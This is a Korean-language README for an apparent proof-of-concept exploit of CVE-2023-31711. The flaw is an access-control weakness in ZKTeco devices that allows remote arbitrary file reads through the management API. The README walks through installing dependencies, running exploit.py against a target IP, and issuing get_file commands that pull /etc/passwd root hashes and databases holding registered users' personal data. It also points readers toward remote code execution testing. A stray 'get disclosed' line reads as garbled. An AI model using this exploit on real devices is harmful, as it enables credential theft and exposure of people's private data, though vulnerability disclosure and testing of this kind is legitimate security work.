CVE-2023-31711
ZKTECO의 부적절한 접근 제어로 인해 원격 공격자가 관리 API를 통해 모든 파일을 읽을 수 있습니다.
필요한 모듈 설치
- ZKTEco 디렉토리 내에서:
$ pip install -r ./pyzatt/requirements_dev.txt
익스플로잇 실행
- ZKTEco 디렉토리 내에서:
$ python exploit.py <ip_address>
Connected to 10.0.2.25
(Cmd) get_file <file_name>
예시:
get_file /etc/passwd: 루트 비밀번호 해시 노출
get_file /mnt/mtdblock/data/ZKDB.db: 등록된 사용자의 개인정보(PII) 노출. 내용을 읽으려면 이 명령을 순차적으로 여러 번 실행해야 할 수 있습니다.
get disclosed
get_file /mnt/mtdblock/data/ZKSystem.db: 시스템 관련 민감 정보 노출
크레딧
참고
이 장치는 관리 API를 통해 원격 코드 실행(RCE)에도 취약할 수 있습니다. 크레딧 섹션에 언급된 익스플로잇은 이에 대한 테스트를 찾기에 좋은 장소일 수 있습니다.